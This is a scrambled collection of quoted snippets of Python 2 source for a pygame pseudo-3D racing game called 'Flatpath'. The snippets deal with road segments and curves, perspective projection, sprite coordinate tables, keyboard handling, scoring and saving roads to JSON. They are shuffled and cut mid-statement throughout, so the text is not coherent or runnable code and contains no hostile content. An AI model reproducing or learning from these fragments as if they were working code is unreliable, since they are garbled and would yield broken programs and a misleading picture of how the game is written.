200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h =", "* p_dt) if hill.rect.left + hill.rect.width < 0: hill.rect.left +=", "= 0.0 #xc1 = self.road_w / 2 - self.player_x #xc2", "'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215, 'h': 220", "curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold): self.rd_seg_add(curve,", "#print '-' * 30 ''' ''' #x# if seg['index'] <", "self.pglc.KEYUP: k = event.key if k == self.pglc.K_SPACE: # hide", "d = 116 pnts = [[x1, d-y1], [x2, d-y2], [x3,", "self.xc_to_xp(xcl4, self.d, zc2) xsl4 = self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1,", "obj # for reset to delete all # NOTE: only", "= zw2 - self.camera_z - self.position #zc1 = self.position -", "#+ dx1 ''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "def handle_event(self, events, *args, **kwargs): #print '>>> ', events if", "= 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top =", "b, percent): return a + (b - a) * math.pow(percent,", "20 n = seg_n / random.randint(10, 30) for i in", "self.tm_start = time.time() self.tm_end = self.tm_start else: self.tm_end = time.time()", "yw = 0.0 self.add_road(enter, hold, leave, curve, yw) def rd_seg_init_rand_2(self,", "xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 =", "= FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left =", "in events: #print event if event.type == self.pglc.KEYUP: di =", "* dt) def util_increase(self, start, increment, mx): # with looping", "# <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1", "num or ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW'] self.add_road(num, num,", "segs = self.segments else: segs = self.segments[:-self.seg_draw_n] return segs #", "else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def rd_seg_json_save(self,", "610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN) self.spd.rect.top =", "sure we check score once for a segment seg_i =", "self.cfg = cfg self.bg_sky1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0", "self.segs = segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def", "spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c def rd_seg_json_save(self, f):", "*args, **kwargs): return events def refresh(self, fps_clock, *args, **kwargs): pass", "for n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total))", "pnts def get_segs_pnts_1(self, segs, rad): pnts = [] x, y", "- i) ca = 200 / n * (n -", "/ 2.0 #y_sprt = (ys1 + ys3) / 2.0 x_dt", "x_i == 2: sprt_at = 580 elif x_i == 3:", "return xp def yc_to_yp(self, yc, d, zc): if zc ==", "self.tm_end = self.tm_start else: self.tm_end = time.time() self.tm_last_once = self.tm_end", "n in range(leave): self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def", "= False self.game_score = 0.0 self.tm_start = 0.0 self.tm_end =", "if not segs_file: segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'", "'w': 80, 'h': 41 } } FP_COLOR_WHITE = '#FFFFFF' FP_COLOR_BLACK", "random.randint(10, 100) hold = random.randint(10, 100) leave = random.randint(10, 100)", "self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ", "init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is not None: try: segs", "240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top", "int(pos / self.seg_len) #x#i = int(utils.math_round(pos / self.seg_len)) #i =", "}, 'CAR03': { 'x': 1383, 'y': 760, 'w': 88, 'h':", "'SKY': { 'x': 5, 'y': 495, 'w': 1280, 'h': 480", "= - (b_curve * b_percent) x_curve = 0 # <1>", "= self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ)", "#for i, seg in enumerate(self.segments): # <2> for i in", "self.camera_h #print '=' * 80 #print 'self.position', self.position for i,", "x_i == 1: sprt_at = -40 elif x_i == 2:", "return 1 elif k == self.pglc.K_SPACE or k == self.pglc.K_v", "e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn =", "import random import time from starfish import pygm from starfish", "59 }, 'CAR04': { 'x': 1383, 'y': 894, 'w': 80,", "122, 'h': 144 }, 'TRUCK': { 'x': 1365, 'y': 644,", "* math.sin(tht) pnts.append([x, y]) #print pnts return pnts def get_segs_pnts_1(self,", "if k == self.pglc.K_SPACE: # hide / show road map", "}, 'SKY': { 'x': 5, 'y': 495, 'w': 1280, 'h':", "elif 2 in e_keys_dn: self.player_go = 2 if 1 in", "return d / zc def xc_to_xp(self, xc, d, zc): if", "(int(yw) * self.seg_len) total = enter + hold + leave", "from starfish import sptdraw from starfish import utils IMG_POS_BACKGROUND =", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg = cfg self.car", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2)", "'BUSH2': { 'x': 255, 'y': 1097, 'w': 232, 'h': 152", "1 elif self.player_di == 1: self.player_x += 19 if self.player_x", "self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1,", "<2> si = (segbi + i) % seg_n #print si", "self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve", "img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def", "= xc1 - self.lane_w xcl2 = xc2 + self.lane_w xcl3", "s = { 'name': sprt, 'type': 1, # image /", "** 64 xp = xc else: xp = xc *", "mx): return max(mn, min(value, mx)) def util_accelerate(self, v, accel, dt):", "-= self.speed_dt_dn else: self.speed -= self.speed_dt_na # if on the", "FPSptBg(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos)", "= self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w') as fo:", "replay this road * RETURN : go to a new", "a) * math.pow(percent, 2) def util_ease_out(self, a, b, percent): return", "for test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent", "= self.size[0] self.h = self.size[1] if not keep_segs: self.segments =", "[] self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z = 500.0#1000.0#0.0", "self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass'])", "n = len(self.segments) #print n if n % 2 ==", "obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1, y1, x2,", "{'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE,", "/180.0 * 0.9 #theta_i = 0.0 xc1 = self.road_w /", "= xcr4 - x_curve - dx_curve x_curve = x_curve +", "2 - self.player_x xc2 = -self.road_w / 2 - self.player_x", "*args, **kwargs): super(FPSceneA, self).__init__(*args, **kwargs) self.straight = FPStraight({}) self.straight.rect.top =", "FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) #", "float(curve) / rad a *= 10.0 #print a if a", "car self.player_di = 0 # 0:^ 1:> 2:v 3:< self.player_go", "= fi.read() segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\"", "def refresh(self, fps_clock, *args, **kwargs): self.check_player_di(self.e_keys_dn, self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world()", "zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #", "n * (n - i) ca = 200 / n", "font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once =", "1383, 'y': 825, 'w': 80, 'h': 59 }, 'CAR04': {", "0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top", "0.1 #theta_i = math.pi /180.0 * 0.5 theta_i = math.pi", "in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n =", "#if (car_x + car_w / 2) < sprt_x < (car_x", "0.0 self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0]", "170 }, 'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298,", "self.segments.append(seg) self.track_len = len(self.segments) * self.seg_len #self.track_len = (len(self.segments) -", "a = 1.0 #tht_d = math.acos(a) tht_d = math.asin(a) return", "self.camera_z - (self.position % self.seg_len) ''' #x# zw1 = seg['p1']['world']['z']", "__init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args,", "''' ''' #x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len", "go forward forever. http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT *", "self.pglc.K_UP: return 0 elif k == self.pglc.K_RIGHT: return 1 elif", "'h': 248 }, 'BUSH1': { 'x': 5, 'y': 1097, 'w':", "result -= mx while (result < 0): result += mx", "self.segments[(segbi + 2) % seg_n] # for test #self.base_seg['color'] =", "score once for a segment seg_i = self.player_seg['index'] if seg_i", "class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw, winh, *args, **kwargs): super(GMFlatpath,", "x3, y3, x4, y4, color): #d = 200#100#240#50# #a =", "self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt) if trees.rect.left + trees.rect.width", "s = fi.read() segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self):", "p = random.random() #print p rl = random.choice([1, -1]) if", "FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0, 81, 8, 0], h=30, *args,", "= [xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2 +", "**kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg)", "not seg['sprites']: segs_c.append(seg) else: seg_c = {} for k, v", "-1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score':", "ys3, seg['color']['rumble']) def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 *", "+ x, self.size[1] / 2 - y] def cv_to_engl(self, curve,", "45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80,", "rad #a *= 10.0 #print a s = 1.0 if", "yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self):", "(i+2)*self.seg_len else: # <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z']", "self.xp_to_xs(xp1, self.w) xp2 = self.xc_to_xp(xc2, self.d, zc1) xs2 = self.xp_to_xs(xp2,", "seg_scale #x_sprt = (xs1 + xs2) / 2.0 #y_sprt =", "else: xp = xc * (d / zc) return xp", "{ 'x': 230, 'y': 5, 'w': 385, 'h': 265 },", "yp = yc else: yp = yc * (d /", "self).__init__(size) self.segs = segs self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad)", "= 0.0 self.xc = 0.0 self.yc = 0.0 self.zc =", "if zc == 0.0: #xp = float('inf') #xp = 2", "zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d, zc2)", "-= trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs,", "self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def", "2 yc = self.camera_h print '=' * 80 print 'self.position',", "#print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world y',", "Flatpath, go forward forever. http://codeincomplete.com/posts/javascript-racer/ http://www.extentofthejam.com/pseudo/ http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT", "num, 0, 0) self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num,", "', events if not self.flag_check_event: return events else: return self.check_key(events)", "#''' # <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1", "* yp ys = h / 2.0 - yp return", "- (zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "248 }, 'BUSH1': { 'x': 5, 'y': 1097, 'w': 240,", "# NOTE: only show one break return obj def handle_event(self,", "= 0.0 self.yc = 0.0 self.zc = 0.0 ## self.xp", "= 0.0 self.ys = 0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w =", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "geo_prjc_scale(self, d, zc): if zc == 0.0: return 1.0 else:", "float('inf') #xp = 2 ** 64 xp = xc else:", "hill.rect.width > 0: hill.rect.left -= hill.rect.width * 2 for trees", "- x_curve xc3 = xc3 - x_curve - dx_curve xc4", "== 0.0: return 1.0 else: return d / zc def", "consts.BLUE, # (int(xsr1), 116 - int(ys1)), # 3, 0) #", "x_curve xc2 = xc2 - x_curve xc3 = xc3 -", "if obj: self.rd_sprt_cache.append(obj) # render the sprites with right order", "test 2: draw a circle\"\"\" #theta_i = math.pi /180.0 *", "'-' * 60 pass def rd_sprts_render(self, seg, x_pos, x_i, y,", "+ car_w / 2): if (car_x - w_half) < sprt_at", "self).__init__(size) self.c_bg = c_bg self.c_prog = c_prog self.progress(0.0) def progress(self,", "self.pglc.KEYUP: di = self.key_to_di(event.key) if di is None: di =", "img): return cls(img) # for test #o = SptTmpx((40, 40))", "print '=' * 80 print 'self.position', self.position # <2> seg_n", "random.randint(10, 40) leave = random.randint(10, 40) curve = rl *", "= random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s =", "self.h) ys4 = ys3 #''' #if 1: #if i <", "xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self): \"\"\"curve test 2: draw a", "more road sprites * sound \"\"\" import math import random", "xp return xs def yp_to_ys(self, yp, h): #ys = h", "import time from starfish import pygm from starfish import consts", "print 'segbi', segbi # TODO: do at update #dpx1 =", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7:", "45 }, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80,", "if self.speed < 0.0: self.speed = 0.0 elif self.speed >", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1)", "self.camera_z - self.position curve_d = 500 #x#xc1 = self.road_w /", "2.0, xsl1, xsl2] #x_sprt = xsr1 x_sprt = (xsr1 +", "'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,},", "if self.speed <= 0.0: return p_curve = self.player_seg.get('curve', 0.0) #p_curve", "= sprts[0] x_i = sprt.get('x_i') if x_i is None: return", "self.game_score = 0.0 self.tm_start = 0.0 self.tm_end = 0.0 self.tm_last_once", "'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230, 'h': 220", "[] e_keys_dn = [] for event in events: #print event", "5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'], 'score':", "5, 'w': 282, 'h': 295 }, 'BILLBOARD04': { 'x': 1205,", "0): result += mx return result def util_ease_in(self, a, b,", "FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "y]) #print pnts return pnts def get_segs_pnts_1(self, segs, rad): pnts", "sk, sv in spr.items(): if sk not in ['obj']: spr_n[sk]", "< 0.3: curve = 0.0 yw = 0.0 #elif p", "= 0 if 2 in e_keys_up: if self.player_go != 1:", "rd_seg_init(self, a=500): for n in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self,", "2) < sprt_x < (car_x + car_w / 2): if", "segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def", "self.flag_check_event: return events else: return self.check_key(events) def key_to_di(self, k): if", "= 0.0 ## self.xp = 0.0 self.yp = 0.0 self.xs", "self.car.rect.top = 400 self.car.rect.left = (640 - self.car.rect.width) / 2", "if x_i == 0: sprt_at = 40 elif x_i ==", "'camera': {}, 'screen': {}}, 'curve': curve, 'color': c, 'sprites': [],", "FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left = 0 self.disp_add(self.fog) def get_seg_base_i(self,", "xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 =", "a < 0.0: s = -1.0 if a < -1.0:", "is None: di = self.key_to_di_b(event.key) if di is not None:", "str(int(time.time())) + '.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self,", "i < self.seg_draw_n / 4: theta1 = theta_i * i", "625, 'y': 375, 'w': 300, 'h': 170 }, 'BILLBOARD06': {", "= 70#100#200#150 self.speed = 0.0 self.position = 0.0 self.player_x =", "dx1 #''' self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0,", "zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if", "None def check_key(self, events): #print id(events) r_events = [] e_keys_up", "8.0 yw = 0.0 self.add_road(enter, hold, leave, curve, yw) def", "SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left = 100 self.disp_add(self.sn1) '''", "self.add_road(num, num, num, 0, -height) self.add_road(num, num, num, 0, height)", "'w': 1280, 'h': 480 }, 'TREES': { 'x': 5, 'y':", "< -self.road_w / 2 or \\ self.player_x > self.road_w /", "xp3 = self.xc_to_xp(xc3, self.d, zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4", "road self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,", "= -self.lane_w - self.player_x xcr3 = self.lane_w - self.player_x xcr4", "= seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z'] zw2", "'x': 5, 'y': 5, 'w': 215, 'h': 540 }, 'BILLBOARD08':", "= x_pos[x_i_saved] - obj.rect.width / 2 #obj.scale(scale) info['obj'] = obj", "seg_n = len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg", "def road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True) def road_reset_from_file(self,", "num, num, 0, 0) def rd_seg_get_cleared(self, segs=None): if not segs:", "w / 2.0 * xp xs = w / 2.0", "cloud #sky.rect.left -= self.sky_speed if sky.rect.left + sky.rect.width < 0:", "{ 'x': 313, 'y': 897, 'w': 298, 'h': 190 },", "scr: # None or 0 return obj = sprt.get('obj') if", "= 300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n = 300#200 #self.seg_draw_n =", "= 3 #''' #''' self.position += 10.0#5.0#1.0 self.position += random.randint(2,", "# <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() print 'segbi',", "#xc3 = self.road_w / 2 - self.player_x #xc4 = -self.road_w", "= -self.lane_w - self.player_x yc = self.camera_h print '=' *", "self.d, zc2) xsl3 = self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4, self.d,", "-self.road_w / 2 - self.player_x - curve_d * i #", "self.road_w / 2 - 10) * seg_scale #x_sprt = (xs1", "280, 'w': 320, 'h': 220 }, 'COLUMN': { 'x': 995,", "= random.choice([1, -1]) if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "e self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render() def", "ys3 ''' # for test if i < 10: print", "2 sprt_at = 10000 if x_i == 0: sprt_at =", "}, 'BUSH2': { 'x': 255, 'y': 1097, 'w': 232, 'h':", "self.position += random.randint(2, 10) if self.position > self.track_len: self.position -=", "zc1) xs2 = self.xp_to_xs(xp2, self.w) xp3 = self.xc_to_xp(xc3, self.d, zc2)", "event if event.type == self.pglc.KEYUP: k = event.key if k", "1\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i = math.pi", "1 continue x += rad_m * math.cos(tht) y += rad_m", "3: self.player_di = 0 if 3 in e_keys_up: if self.player_di", "yp3 = self.yc_to_yp(yc, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4", "= 0.0 self.zw = 0.0 self.xc = 0.0 self.yc =", "* p_dt) if trees.rect.left + trees.rect.width < 0: trees.rect.left +=", "return 2 elif k == self.pglc.K_LEFT: return 3 else: return", "{ 'x': 995, 'y': 480, 'w': 80, 'h': 41 },", "if n % 2 == 0: #if n % 4", "xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i =", "= 0.0 def update_bg(self): # always move the cloud for", "at update #dpx1 = self.seg_len * math.tan(theta_i) #self.player_x -= dpx1", "trees.rect.width > 0: trees.rect.left -= trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase):", "'h': 480 }, 'SKY': { 'x': 5, 'y': 495, 'w':", "240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480, 480),", "car_w = self.car.rect.width * 2 sprt_at = 10000 if x_i", "- 2, y]) # from down to up self.pygm.draw.rect(self.surf, self.c_prog,", "xs3 = self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4", "None: return scr = sprt.get('score') if not scr: # None", "/ rad a *= 10.0 #print a if a <", "xsr1 x_sprt = (xsr1 + xsl1) / 2.0 #x_sprt =", "h self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2", "#dpx1 = self.seg_len * math.tan(theta_i) #self.player_x -= dpx1 # <1>", "if p < 0.3: curve = 0.0 yw = 0.0", "x_rnd * seg_scale x_pos = [xsr1, xsr2, (xsr1 + xsl1)", "math.pow(percent, 2) def util_ease_out(self, a, b, percent): return a +", "event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def refresh(self,", "1205, 'y': 5, 'w': 282, 'h': 295 }, 'BILLBOARD04': {", "/ 2 or \\ self.player_x > self.road_w / 2: if", "scr def check_tm(self): if self.position > self.seg_len * 2: if", "def rd_seg_json_load(self, f): with open(f, 'r') as fi: s =", "* self.centrifugal #p_dt = 40 #p_dt = -40 #p_dt =", "81, 8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c =", "- self.position zc2 = zw2 - self.camera_z - self.position '''", "xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3", "'x': 5, 'y': 1097, 'w': 240, 'h': 155 }, 'CACTUS':", "from starfish import utils IMG_POS_BACKGROUND = { 'HILLS': { 'x':", "}, 'TREE1': { 'x': 625, 'y': 5, 'w': 360, 'h':", "'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane':", "self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max", "['img_sprts/blobb1.png'], 'score': -50,}, 'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,}, 'clown': {'imgs':", "80 #print 'self.position', self.position # <2> seg_n = len(self.segments) segbi", "TODO: * hill road * more road sprites * sound", "too large if scale > 500: #print 'scale <1>', scale", "''' ''' self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200", "self.rdmap = FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left", "#if self.score < 0: # self.score = 0 self.game_over =", "elif self.player_di == 1: self.player_x += 19 if self.player_x >", "'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble':", "xc3 - self.lane_w #xcl4 = xc4 + self.lane_w xcr1 =", "-= tht_d rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l =", "= self.segments[(segbi + 2) % seg_n] # for test #self.base_seg['color']", "self.position #zc1 = self.position - (zw1 - self.camera_z) #zc2 =", "utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class", "= seg.get('curve', 0.0) if curve == 0.0: if cv_s: tht_d", "8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c = c", "''' # TODO: <1> if not obj: obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0])", "sprt_at = 10000 if x_i == 0: sprt_at = 40", "== 2: self.speed -= self.speed_dt_dn else: self.speed -= self.speed_dt_na #", "}, 'STUMP': { 'x': 995, 'y': 330, 'w': 195, 'h':", "rad): pnts = [] x, y = 0.0, 0.0 tht", "-= 1 #if self.score < 0: # self.score = 0", "'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass':", "random.randint(-100, 100) #print p_dt for sky in self.bg_sky: #print sky", "# road self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3,", "self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1, self.w)", "not segs_file: segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt' segs_file", "'x': 5, 'y': 555, 'w': 135, 'h': 332 }, 'BILLBOARD09':", "None: di = self.key_to_di_b(event.key) if di is not None: e_keys_dn.append(di)", "in range(self.seg_draw_n): #''' # <2> si = (segbi + i)", "# for a3c train self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n)", "random.randint(10, 30) for i in range(n): j = random.randint(10, seg_n", "else: pass p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve p_dt", "c = FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE} else: c =", "self.player_go = 2 if 1 